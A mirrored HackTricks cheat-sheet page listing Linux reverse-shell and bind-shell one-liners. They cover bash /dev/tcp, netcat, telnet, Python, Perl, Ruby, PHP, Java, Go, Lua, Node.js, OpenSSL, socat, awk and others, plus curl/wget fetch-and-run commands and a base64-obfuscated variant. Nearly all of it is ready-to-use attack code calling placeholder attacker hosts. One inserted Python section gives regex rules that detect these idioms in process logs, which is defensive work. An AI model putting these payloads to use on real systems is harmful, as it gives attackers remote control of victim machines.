mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
363 lines
15 KiB
Markdown
# Shells - Linux
<details>

<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)

## Full TTY

**Once you get a reverse shell,** [**read this page to obtain a full TTY**](full-ttys.md)**.**

## Bash | sh

```bash
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done

#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell to get the output to execute
exec >&0
```

Don't forget to check with other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash.

### Symbol safe shell

```bash
#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'

#Stealthier method
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
```

#### Shell explanation

1. **`bash -i`**: This part of the command starts an interactive (`-i`) Bash shell.
2. **`>&`**: This part of the command is a shorthand notation for **redirecting both standard output** (`stdout`) and **standard error** (`stderr`) to the **same destination**.
3. **`/dev/tcp/<ATTACKER-IP>/<PORT>`**: This is a special path that **represents a TCP connection to the specified IP address and port**. No such file exists on disk: Bash handles these paths itself when a redirection targets them, which is why the one-liner needs Bash and fails in `dash`-style `/bin/sh`.
   * By **redirecting the output and error streams to this path**, the command effectively sends the output of the interactive shell session to the attacker's machine.
4. **`0>&1`**: This part of the command **redirects standard input (`stdin`) to the same destination as standard output (`stdout`)**, so commands typed on the attacker's side are read by the shell.
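From the defender's side, the idioms collected on this page (the `/dev/tcp` redirection explained above, the `mkfifo` pipe into netcat, `socat ... EXEC:`, the Python `dup2` one-liner and the base64-decode-to-bash variant) are recognisable in process-creation telemetry. The following Python detector is an added example, not part of the original HackTricks page; the record format (`<ts> user=... comm=... cmdline=...`) and the sample records are constructed assumptions.

```python
import re

# Constructed process-creation records (not real logs): "<ts> user=<u> comm=<bin> cmdline=<argv>"
SAMPLE_LOG = """\
2024-11-22T20:50:01Z user=www-data comm=bash cmdline=bash -i >& /dev/tcp/203.0.113.5/4444 0>&1
2024-11-22T20:50:02Z user=www-data comm=sh cmdline=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.5 4444 >/tmp/f
2024-11-22T20:50:03Z user=app comm=python cmdline=python -c import socket,os,pty;s=socket.socket();s.connect(("203.0.113.5",4343));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")
2024-11-22T20:50:04Z user=root comm=socat cmdline=socat TCP4:203.0.113.5:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
2024-11-22T20:50:05Z user=www-data comm=sh cmdline=echo Zm9v | base64 -d | bash
2024-11-22T20:50:06Z user=alice comm=curl cmdline=curl https://example.com/health
2024-11-22T20:50:07Z user=bob comm=nc cmdline=nc -z 10.0.0.2 22
"""

# One regex per reverse-shell idiom from the page; each keys on the feature that
# a benign command line almost never has (a /dev/tcp path, a fifo piped into nc, ...).
RULES = {
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+"),
    "fifo_to_netcat": re.compile(r"\b(mkfifo|mknod)\s+\S+.*\b(nc|ncat|telnet|openssl)\b"),
    "netcat_exec": re.compile(r"\b(nc|ncat)\b.*\s-e\s+/bin/(ba)?sh\b"),
    "socat_exec": re.compile(r"\bsocat\b.*\bEXEC:(bash|/bin/sh|sh)\b"),
    "python_dup2_shell": re.compile(r"socket\.socket\(.*dup2\(.*(pty\.spawn|subprocess\.call|/bin/sh)"),
    "base64_decode_to_shell": re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b"),
}

LOG_RE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) comm=(?P<comm>\S+) cmdline=(?P<cmd>.*)$")

def parse_record(line):
    """Split one record into its fields; returns None for lines that do not fit the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(cmdline):
    """Return the names of every rule the command line triggers (empty list if benign)."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(log_text):
    """Return (user, comm, rules) for each record that triggers at least one rule."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        rules = classify(rec["cmd"])
        if rules:
            hits.append((rec["user"], rec["comm"], rules))
    return hits

if __name__ == "__main__":
    for user, comm, rules in scan(SAMPLE_LOG):
        print(f"ALERT user={user} comm={comm} rules={','.join(rules)}")
```

The two benign records (a health-check `curl` and an `nc -z` port probe) show the rules key on the shell-wiring features rather than on the binary name alone.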

### Create in file and execute

```bash
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
```

## Forward Shell

You might find cases where you have an **RCE in a web app in a Linux machine** but due to iptables rules or other kinds of filtering **you cannot get a reverse shell**. This "shell" allows you to maintain a PTY shell through that RCE using pipes inside the victim system.\
You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)

You just need to modify:

* The URL of the vulnerable host
* The prefix and suffix of your payload (if any)
* The way the payload is sent (headers? data? extra info?)

Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).

## Netcat

```bash
nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```

## Telnet

```bash
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```

## Whois

**Attacker**

```bash
while true; do nc -l <port>; done
```

To send the command write it down, press enter and press CTRL+D (to stop STDIN)

**Victim**

```bash
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
```

## Python

```bash
#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
```

## Perl

```bash
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

## Ruby

```bash
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```

## PHP

```php
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

// Using 'proc_open' makes no assumptions about what the file descriptor will be.
// See https://security.stackexchange.com/a/198944 for more information
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
```

## Java

```groovy
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

## Ncat

```bash
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl
```

## Golang

```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
```

## Lua

```bash
#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux (the popen mode must use double quotes; a single-quoted 'r' would terminate the shell's single-quoted -e argument)
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```

## NodeJS

```javascript
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "10.17.26.64", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

// or

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")

// or

var x = global.process.mainModule.require
x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')

// or

// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()

// or

// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');

// or

// https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```

## OpenSSL

The Attacker (Kali)

```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here you will be able to get the response
```

The Victim

```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
```

## **Socat**

[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)

### Bind shell

```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
```

### Reverse shell

```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
```

## Awk

```bash
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```

## Finger

**Attacker**

```bash
while true; do nc -l 79; done
```

To send the command write it down, press enter and press CTRL+D (to stop STDIN)

**Victim**

```bash
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null)`; sleep 1; done

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
```

## Gawk

```bash
#!/usr/bin/gawk -f

BEGIN {
    Port = 8080
    Prompt = "bkd> "

    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
```

## Xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

```bash
xterm -display 10.0.0.1:1
```

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

```bash
Xnest :1
```

You’ll need to authorise the target to connect to you (command also run on your host):

```bash
xhost +targetip
```

## Groovy

by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: The Java reverse shell also works for Groovy

```groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

## Bibliography

{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}

{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell" %}

{% embed url="https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/" %}

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}